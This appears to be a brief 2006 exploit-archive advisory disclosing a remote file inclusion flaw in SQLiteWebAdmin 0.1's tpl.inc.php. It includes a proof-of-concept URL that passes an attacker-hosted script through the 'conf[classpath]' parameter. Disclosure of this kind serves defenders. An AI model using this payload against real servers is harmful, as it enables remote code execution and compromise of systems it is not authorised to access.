SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability
# Published : 2006-08-07
# Author : SirDarckCat
# Previous Title : Torbstoff News 4 (pfad) Remote File Inclusion Vulnerability
# Next Title : Joomla JD-Wiki Component <= 1.0.2 Remote Include Vulnerability

SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin

SQLiteWebAdmin is a simple PHP program for administrating
a SQL DataBase.

It suffers of a Remote File Inclusion Vulnerability.

The bug is in the "tpl.inc.php" program in the "lib"
directory, and is exploited when passing the parameter
"conf[classpath]".

http://www.server.com/lib/tpl.inc.php?conf[classpath]=[URL-OF-SCRIPT]

Succesfull explotation, needs register_globals=on

Att.
SirDarckCat
elhacker.net

# www.Syue.com [2006-08-07]